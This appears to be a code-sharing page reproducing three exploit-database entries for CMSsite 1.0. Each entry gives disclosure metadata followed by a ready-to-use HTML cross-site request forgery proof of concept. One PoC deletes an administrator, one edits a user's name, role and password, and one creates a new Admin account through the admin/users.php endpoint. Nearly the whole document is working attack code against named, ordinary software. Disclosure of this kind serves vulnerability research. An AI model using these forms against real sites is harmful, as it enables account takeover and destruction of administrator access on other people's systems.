扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 |
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: March 1, 2019 # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Tested Version: 1.0 # Tested on: Kali linux, Windows 8.1 # PoC: <!doctype html> <html> <head> <title>Delete Admin</title> </head> <body> <form method="post" action="http://localhost/[PATH]/admin/users.php?del=1"> <input type="submit" value="Delete"> </form> </body> </html> # Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: March 1, 2019 # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Tested Version: 1.0 # Tested on: Kali linux, Windows 8.1 # PoC: <!doctype html> <html> <head> <title>Edit Admin</title> </head> <body> <form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" > <!-- You can change u_id value --> <div class="form-group"> <label for="user_title">User Name</label> <input type="text" name="user_name" required> </div><br> <div class="form-group"> <label for="user_author">FirstName</label> <input type="text" name="user_firstname" required> </div><br> <div class="form-group"> <label for="user_status">LastName</label> <input type="text" name="user_lastname" required> </div><br> <div class="input-group"> <select name="user_role" id=""> <label for="user_role">Role</label> <option value='User'>Admin</option> <option value='User'>User</option> </select> </div><br> <div class="form-group"> <label for="post_image">User Image</label> <input type="file" name="user_image"> </div><br> <div class="form-group"> <label for="user_tag">Email</label> <input type="email" name="user_email" class="form-control"required> </div><br> <div class="form-group"> <label for="user_tag">Password</label> <input type="password" name="user_password" required> </div><br> <hr> <button type="submit" name="update_user" value="Update User">Update User</button> </form> </body> </html> # Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: March 1, 2019 # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Tested Version: 1.0 # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Add Admin</title> </head> <body> <form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label for="user_title">User Name</label> <input type="text" name="user_name" required><br><br> </div> <div class="form-group"> <label for="user_author">FirstName</label> <input type="text" name="user_firstname" required><br><br> </div> <div class="form-group"> <label for="user_status">LastName</label> <input type="text" name="user_lastname" required><br><br> </div> <div class="form-group"> <label for="user_image">Image</label> <input type="file" name="user_image" required><br><br> </div> <div class="input-group"> <select name="user_role" id=""> <label for="user_role">Role</label> <option value='Admin'>Admin</option><option value='User'>User</option> </select><br><br> </div> <div class="form-group"> <label for="user_tag">Email</label> <input type="email" name="user_email" required><br><br> </div> <div class="form-group"> <label for="user_tag">Password</label> <input type="password" name="user_password" required><br><br> </div> <button type="submit" name="create_user" value="Add User">Add User</button> </form> </body> </html> |
体验盒子
